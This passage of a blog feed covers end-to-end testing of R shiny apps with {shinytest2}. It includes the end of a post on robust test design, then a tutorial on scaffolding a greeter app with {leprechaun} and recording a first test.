for web applications and to the new package {shinytest2}. These kinds of
tests are very powerful and with {shinytest2}’s test recorder, they are
relatively easy to construct. But, because the whole app is within their
scope, these tests can be quite fragile and difficult to follow. So if you
find that small changes to your app cause seemingly unconnected tests
to fail, or that keeping your tests passing requires you to make very
similar changes in multiple places, you may benefit from some of the
ideas in this post:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Can you introduce some functions (or POM methods) to clarify what is
happening in each step of your test?&lt;/li&gt;
&lt;li&gt;Can you ensure that the assertion in your test is only comparing
data that is directly relevant to that test?&lt;/li&gt;
&lt;/ul&gt;
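&lt;p&gt;As one way of narrowing an assertion, a snapshot expectation can be
restricted to a single output. The sketch below assumes the greeter app from
this series, with its &lt;code&gt;greeting&lt;/code&gt; output, and uses the &lt;code&gt;output&lt;/code&gt;
argument of &lt;code&gt;expect_values()&lt;/code&gt; so that only that output is stored and
compared.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;test_that(&amp;#34;the greeter app greets the user by name&amp;#34;, {
  # GIVEN: The app is open
  app = shinytest2::AppDriver$new(shinyGreeter::run(), name = &amp;#34;greeter&amp;#34;)

  # WHEN: the user enters their name and clicks the &amp;#34;Greet&amp;#34; button
  app$set_inputs(name = &amp;#34;Jumping Rivers&amp;#34;)
  app$click(&amp;#34;greet&amp;#34;)

  # THEN: only the &amp;#34;greeting&amp;#34; output is compared against the snapshot,
  # so unrelated inputs and outputs cannot make this test fail
  app$expect_values(output = &amp;#34;greeting&amp;#34;)
})
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;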
&lt;p&gt;The shinytest2 vignettes (&lt;a href="https://rstudio.github.io/shinytest2/articles/robust.html" rel="external"&gt;Robust
testing&lt;/a&gt;,
&lt;a href="https://rstudio.github.io/shinytest2/articles/in-depth.html" rel="external"&gt;Testing in
depth&lt;/a&gt;)
discuss some of the ideas in this post in more depth, and with a
slightly different perspective.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/end-to-end-testing-shinytest2-part-3/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>End-to-end testing with shinytest2: Part 2</title><link>https://www.jumpingrivers.com/blog/end-to-end-testing-shinytest2-part-2/</link><pubDate>Thu, 12 Jan 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/end-to-end-testing-shinytest2-part-2/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/end-to-end-testing-shinytest2-part-2/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/end-to-end-testing-shinytest2-part-2/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;This is the second of a series of three blog posts about using the
{shinytest2} package to develop automated tests for shiny applications.
In the posts we will cover&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://www.jumpingrivers.com/blog/end-to-end-testing-shinytest2-part-1/" rel="external"&gt;the purpose of browser-driven end-to-end tests for a shiny
developer, and tools (like {shinytest2}) that help implement
them&lt;/a&gt;;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;how to write and run a simple test using {shinytest2} (this post);&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://www.jumpingrivers.com/blog/end-to-end-testing-shinytest2-part-3/" rel="external"&gt;how best to design your test code so that it supports your future
work&lt;/a&gt;.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Here, we will write a simple shiny app (as an R package) and show how to
generate tests for this app using {shinytest2}. As discussed in the
previous post, {shinytest2} tests your app as if a user was interacting
with it in their browser. The tests generated are application-focussed
rather than component-focussed and so give some overall guarantees on
how the app should behave.&lt;/p&gt;
&lt;p&gt;This post is slightly more technical than the last, and assumes that the
reader is comfortable with creating and unit-testing packages in R, and
with shiny development in general.&lt;/p&gt;
&lt;p&gt;The packages used in this post can be installed as follows:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;install.packages&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;devtools&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;leprechaun&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;shiny&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;shinytest2&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;testthat&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;usethis&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="initialising-a-shiny-app-as-a-package-using-leprechaun"&gt;Initialising a shiny app as a package using leprechaun&lt;/h2&gt;
&lt;p&gt;At &lt;a href="https://www.jumpingrivers.com" rel="external"&gt;Jumping Rivers&lt;/a&gt;, our shiny
applications are developed as packages. The one used here was generated
with &lt;a href="https://leprechaun.opifex.org/#/" rel="external"&gt;{leprechaun}&lt;/a&gt;. The workflow for
building apps using leprechaun has three main steps.&lt;/p&gt;
&lt;p&gt;First, initialise a new package:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Create a new R package in the directory &amp;#34;shinyGreeter&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;usethis&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;create_package&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;shinyGreeter&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Second, add a shiny app skeleton using leprechaun’s &lt;code&gt;scaffold()&lt;/code&gt;
function (all subsequent code is evaluated inside the “shinyGreeter”
directory, created above):&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Add a basic shiny app and leprechaun-derived helper functions etc&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;leprechaun&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;scaffold&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Those two steps add all the code for a working (if basic) shiny app.
Running the app requires some additional steps: documenting and loading the
new package. Note that ‘documenting’ the package also ensures that any
dependencies will be made available to the loaded package (for us, if we
ran this app without having called &lt;code&gt;document()&lt;/code&gt; it would fail to find
the &lt;code&gt;shinyApp()&lt;/code&gt; function from {shiny}).&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Document the package dependencies etc&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;devtools&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;document&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Load the package&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;devtools&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;load_all&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Load (alternative):&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# - install the &amp;#34;shinyGreeter&amp;#34; package&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# - then use `library(shinyGreeter)`&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Finally, to prove that we have created a working shiny app, we want to
run this skeleton app. For that purpose, leprechaun added a &lt;code&gt;run()&lt;/code&gt;
function to our package as part of the scaffolding process (here, this
is &lt;code&gt;shinyGreeter::run()&lt;/code&gt;). The running app doesn’t actually use the
leprechaun package at all.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Start the app&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;run&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Please see the &lt;a href="https://leprechaun.opifex.org/#/" rel="external"&gt;leprechaun
documentation&lt;/a&gt; for further details on
using this package to build your shiny applications.&lt;/p&gt;
&lt;h3 id="adding-some-testable-functionality-to-the-app"&gt;Adding some testable functionality to the app&lt;/h3&gt;
&lt;p&gt;We still need something to test.&lt;/p&gt;
&lt;p&gt;In a leprechaun app, the main UI and server functions are defined in
&lt;code&gt;./R/ui.R&lt;/code&gt; and &lt;code&gt;./R/server.R&lt;/code&gt;, respectively. We will replace the code
that leprechaun added to these files as follows, to give us an app that
responds to user input.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# In ./R/ui.R&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;ui &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(req) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;fluidPage&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;textInput&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;name&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;What is your name?&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;actionButton&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;greet&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Greet&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;textOutput&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;greeting&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# In ./R/server.R&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;server &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(input, output, session) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; output&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;greeting &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;-&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;renderText&lt;/span&gt;({
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;req&lt;/span&gt;(input&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;greet)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;paste0&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Hello &amp;#34;&lt;/span&gt;, &lt;span style="color:#d2a8ff;font-weight:bold"&gt;isolate&lt;/span&gt;(input&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;name), &lt;span style="color:#a5d6ff"&gt;&amp;#34;!&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; })
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The resulting app (which is based on an app in the {shinytest2}
documentation) is a reactive “Hello, World!” app. The user enters their
name into a text field and, after they click a button, the app prints
out a “Hello ‘user’!” welcome message in response.&lt;/p&gt;
&lt;p&gt;Since we have changed the source code, we have to reload the package
prior to running the app. Then we can manually check that it behaves as
expected.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;devtools&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;document&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;devtools&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;load_all&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;run&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="adding-shinytest2-infrastructure-to-our-app"&gt;Adding shinytest2 infrastructure to our app&lt;/h2&gt;
&lt;p&gt;{shinytest2} provides a utility function, similar to those in {usethis},
that adds all the infrastructure needed for its use:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;shinytest2&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;use_shinytest2&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Here, this adds some files to the &lt;code&gt;./tests/testthat/&lt;/code&gt; directory and adds
{shinytest2} as a suggested dependency of the package.&lt;/p&gt;
&lt;p&gt;{shinytest2} requires an entry point into the app-under-test, so that it
knows how to start the app. Typical shiny apps have a top-level &lt;code&gt;app.R&lt;/code&gt;
file (or a combination of &lt;code&gt;global.R&lt;/code&gt;, &lt;code&gt;server.R&lt;/code&gt; and &lt;code&gt;ui.R&lt;/code&gt;) which is
used to run the app. To add {shinytest2} tests to a package, you can
either&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;add a top-level &lt;code&gt;app.R&lt;/code&gt; file (and so convert into a more typical
shiny app structure),&lt;/li&gt;
&lt;li&gt;add an &lt;code&gt;app.R&lt;/code&gt; into a subdirectory of &lt;code&gt;./inst/&lt;/code&gt;,&lt;/li&gt;
&lt;li&gt;or use a function (like the &lt;code&gt;run()&lt;/code&gt; function added by {leprechaun})
that returns the shiny app object&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Here, we choose to use the last of these approaches. See the &lt;a href="https://rstudio.github.io/shinytest2/articles/use-package.html" rel="external"&gt;shinytest2
vignette&lt;/a&gt;
for more details on how to use {shinytest2} with a packaged shiny
application.&lt;/p&gt;
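&lt;p&gt;For comparison, the second option in the list above might look something
like the sketch below. The directory name &lt;code&gt;greeter-app&lt;/code&gt; is a
hypothetical choice, and the test assumes that the package has been installed
so that both &lt;code&gt;system.file()&lt;/code&gt; and the app&amp;rsquo;s own R process can find
it.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;# In ./inst/greeter-app/app.R (hypothetical location)
# The last expression of app.R must be the shiny app object
shinyGreeter::run()

# In a test script under ./tests/testthat/
test_that(&amp;#34;the app stored under inst/ starts up&amp;#34;, {
  # Look up the installed copy of the app directory
  app_dir = system.file(&amp;#34;greeter-app&amp;#34;, package = &amp;#34;shinyGreeter&amp;#34;)

  # AppDriver accepts a path to an app directory as well as an app object
  app = shinytest2::AppDriver$new(app_dir, name = &amp;#34;greeter&amp;#34;)

  # Snapshot the initial state of the app, then shut it down
  app$expect_values()
  app$stop()
})
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;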
&lt;p&gt;For those who have used {testthat}, the {shinytest2} test cases will
look familiar and are placed in the same &lt;code&gt;./tests/testthat/&lt;/code&gt; directory
as any other {testthat} test scripts. The code for initialising,
interacting with, and assessing the state of your app is written inside
a &lt;code&gt;test_that()&lt;/code&gt; block. Hence, a typical test case might look as follows
(the GIVEN / WHEN / THEN structure is a common pattern in test code; we
use it here to separate the different steps in the test):&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;test_that&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;a description of the behaviour that is under test here&amp;#34;&lt;/span&gt;, {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# GIVEN: this background information about the app&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# (e.g., the user has opened the app and navigated to the correct tab)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; shiny_app &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; shinyGreeter&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;run&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; app &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; shinytest2&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;AppDriver&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;new&lt;/span&gt;(shiny_app, name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;greeter&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# WHEN: the user performs these actions&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# (e.g., enters their username in the text field)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# ... code to perform the actions ...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# THEN: the app should be in this state&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# (e.g., a customised welcome message is displayed to the user)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#79c0ff"&gt;...&lt;/span&gt; code to check that the app is &lt;span style="color:#ff7b72"&gt;in&lt;/span&gt; the correct state &lt;span style="color:#79c0ff"&gt;...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;})
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Any user actions that we are replicating in our test are performed by
calling methods / functions on the &lt;code&gt;AppDriver&lt;/code&gt; object (named &lt;code&gt;app&lt;/code&gt; in
the above).&lt;/p&gt;
&lt;h2 id="recording-your-first-test"&gt;Recording your first test&lt;/h2&gt;
&lt;p&gt;A sensible first test for our app would be to ensure that when the user
enters their name into the text box and clicks the button, a greeting is
rendered on the screen. The simplest way to define this test is using
the {shinytest2} test recorder.&lt;/p&gt;
&lt;p&gt;To record a test using {shinytest2} you use &lt;code&gt;shinytest2::record_test()&lt;/code&gt;.
This works without a hitch if there is an &lt;code&gt;app.R&lt;/code&gt; or &lt;code&gt;ui.R&lt;/code&gt; / &lt;code&gt;server.R&lt;/code&gt;
combo in your working directory. Since we are working against a package,
we have to tell &lt;code&gt;record_test()&lt;/code&gt; how to run our app:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;devtools&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;load_all&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;shinytest2&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;record_test&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;run&lt;/span&gt;())
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This may lead {shinytest2} to install some additional packages (e.g.,
{shinyvalidate}, {globals}).&lt;/p&gt;
&lt;p&gt;Eventually the app will open, with the {shinytest2} recorder panel
alongside.&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/end-to-end-testing-shinytest2-part-2/graphics/shinytest2-recorder.png" alt="The test-recorder panel for shinytest2. On the left hand side is the Shiny app, consisting of an input box asking 'What is your name' and a button saying Greet. The right hand side contains the {shinytest2} panel, with options to select 'Expect Shiny values' and 'Expect screenshot', a box containing code from the test, and a save option with a warning message 'Can not save tests for a Shiny object. Please supply an application directory to record_test(app_dir =)'" /&gt;
&lt;p&gt;Note that the test recorder warns that it “Can not save tests for a
Shiny object”. This happens because we passed a Shiny app object, rather
than a directory, to &lt;code&gt;record_test()&lt;/code&gt;. It’s nothing to worry about
though, because any code generated by {shinytest2} can be copied from the
code panel into a test script.&lt;/p&gt;
&lt;p&gt;To test the app, we click on the “What is your name?” entry box, type
“Jumping Rivers”, and then click on the “Greet” button.&lt;/p&gt;
&lt;p&gt;We then click on the “Expect Shiny values” button in the test recorder
panel.&lt;/p&gt;
&lt;p&gt;A code snippet that looks like this is shown in the “code” panel.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;app&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;set_window_size&lt;/span&gt;(width &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1619&lt;/span&gt;, height &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;970&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;app&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;set_inputs&lt;/span&gt;(name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Jumping Rivers&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;app&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;click&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;greet&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;app&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;expect_values&lt;/span&gt;()
